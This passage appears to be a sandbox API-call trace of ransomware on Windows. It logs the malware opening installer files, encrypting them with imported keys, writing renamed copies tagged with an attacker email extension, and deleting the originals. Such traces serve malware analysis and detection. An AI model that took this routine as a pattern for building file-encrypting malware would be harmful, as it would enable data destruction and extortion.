lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.011] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=18264) returned 1 [0047.011] CloseHandle (hObject=0x320) returned 1 [0047.011] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll")) returned 0x80 [0047.011] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.011] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.011] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.011] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.011] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0047.012] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72000) returned 1 [0047.012] CryptSetKeyParam (hKey=0xf72000, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.012] ReadFile (in: hFile=0x320, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x4758, lpOverlapped=0x0) returned 1 [0047.013] CryptEncrypt (in: hKey=0xf72000, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4760, dwBufLen=0x4760 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4760) returned 1 [0047.013] WriteFile (in: hFile=0x328, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x4760, lpOverlapped=0x0) returned 1 [0047.014] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf720c0) returned 1 [0047.014] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.014] CryptEncrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0047.014] CryptDestroyKey (hKey=0xf720c0) returned 1 [0047.014] WriteFile (in: hFile=0x328, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0047.014] CryptDestroyKey (hKey=0xf72000) returned 1 [0047.014] CloseHandle (hObject=0x320) returned 1 [0047.015] CloseHandle (hObject=0x328) returned 1 [0047.016] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll")) returned 1 [0047.017] SetEvent (hEvent=0x2e8) returned 1 [0047.017] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.017] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0047.017] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=3546) returned 1 [0047.017] CloseHandle (hObject=0x328) returned 1 [0047.017] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf")) returned 0x80 [0047.018] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.018] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0047.018] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.018] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.018] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.019] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71e80) returned 1 [0047.019] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.019] ReadFile (in: hFile=0x328, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0xdda, lpOverlapped=0x0) returned 1 [0047.020] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xde0, dwBufLen=0xde0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xde0) returned 1 [0047.020] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xde0, lpOverlapped=0x0) returned 1 [0047.021] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b40) returned 1 [0047.021] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.021] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0047.021] CryptDestroyKey (hKey=0xf71b40) returned 1 [0047.021] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0047.022] CryptDestroyKey (hKey=0xf71e80) returned 1 [0047.022] CloseHandle (hObject=0x328) returned 1 [0047.022] CloseHandle (hObject=0x320) returned 1 [0047.022] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf")) returned 1 [0047.023] SetEvent (hEvent=0x2e8) returned 1 [0047.023] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.023] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.023] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=79634) returned 1 [0047.023] CloseHandle (hObject=0x320) returned 1 [0047.023] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml")) returned 0x80 [0047.024] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.024] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.024] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.024] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.024] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0047.024] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71d00) returned 1 [0047.024] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.024] ReadFile (in: hFile=0x320, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x13712, lpOverlapped=0x0) returned 1 [0047.026] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x13720, dwBufLen=0x13720 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x13720) returned 1 [0047.026] WriteFile (in: hFile=0x328, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x13720, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x13720, lpOverlapped=0x0) returned 1 [0047.028] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf720c0) returned 1 [0047.028] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.028] CryptEncrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0047.028] CryptDestroyKey (hKey=0xf720c0) returned 1 [0047.028] WriteFile (in: hFile=0x328, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0047.028] CryptDestroyKey (hKey=0xf71d00) returned 1 [0047.028] CloseHandle (hObject=0x320) returned 1 [0047.028] CloseHandle (hObject=0x328) returned 1 [0047.030] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml")) returned 1 [0047.031] SetEvent (hEvent=0x2e8) returned 1 [0047.031] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.031] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0047.032] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=19288) returned 1 [0047.032] CloseHandle (hObject=0x328) returned 1 [0047.033] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll")) returned 0x80 [0047.033] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.033] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0047.033] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.033] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.033] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.033] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71e00) returned 1 [0047.033] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.033] ReadFile (in: hFile=0x328, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x4b58, lpOverlapped=0x0) returned 1 [0047.034] CryptEncrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4b60, dwBufLen=0x4b60 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4b60) returned 1 [0047.035] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x4b60, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x4b60, lpOverlapped=0x0) returned 1 [0047.036] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71d00) returned 1 [0047.036] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.036] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0047.036] CryptDestroyKey (hKey=0xf71d00) returned 1 [0047.036] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0047.036] CryptDestroyKey (hKey=0xf71e00) returned 1 [0047.036] CloseHandle (hObject=0x328) returned 1 [0047.036] CloseHandle (hObject=0x320) returned 1 [0047.037] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll")) returned 1 [0047.038] SetEvent (hEvent=0x2e8) returned 1 [0047.038] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.038] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.038] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=3046) returned 1 [0047.038] CloseHandle (hObject=0x320) returned 1 [0047.038] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf")) returned 0x80 [0047.038] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.038] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.038] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.038] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.038] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0047.041] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72100) returned 1 [0047.041] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.041] ReadFile (in: hFile=0x320, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0xbe6, lpOverlapped=0x0) returned 1 [0047.042] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xbf0, dwBufLen=0xbf0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xbf0) returned 1 [0047.042] WriteFile (in: hFile=0x328, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xbf0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xbf0, lpOverlapped=0x0) returned 1 [0047.043] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71e40) returned 1 [0047.043] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.043] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0047.043] CryptDestroyKey (hKey=0xf71e40) returned 1 [0047.043] WriteFile (in: hFile=0x328, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0047.043] CryptDestroyKey (hKey=0xf72100) returned 1 [0047.043] CloseHandle (hObject=0x320) returned 1 [0047.043] CloseHandle (hObject=0x328) returned 1 [0047.044] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf")) returned 1 [0047.045] SetEvent (hEvent=0x2e8) returned 1 [0047.045] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.045] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0047.045] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=79296) returned 1 [0047.045] CloseHandle (hObject=0x328) returned 1 [0047.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml")) returned 0x80 [0047.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.046] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0047.046] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.046] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0047.046] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.046] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71a00) returned 1 [0047.046] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.046] ReadFile (in: hFile=0x328, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x135c0, lpOverlapped=0x0) returned 1 [0047.220] CryptEncrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x135d0, dwBufLen=0x135d0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x135d0) returned 1 [0047.220] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x135d0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x135d0, lpOverlapped=0x0) returned 1 [0047.222] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71cc0) returned 1 [0047.222] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0047.222] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0047.222] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0047.223] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0047.223] CryptDestroyKey (hKey=0xf71a00) returned 1 [0047.223] CloseHandle (hObject=0x328) returned 1 [0047.223] CloseHandle (hObject=0x320) returned 1 [0047.225] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml")) returned 1 [0047.226] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0047.226] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0x80000000, 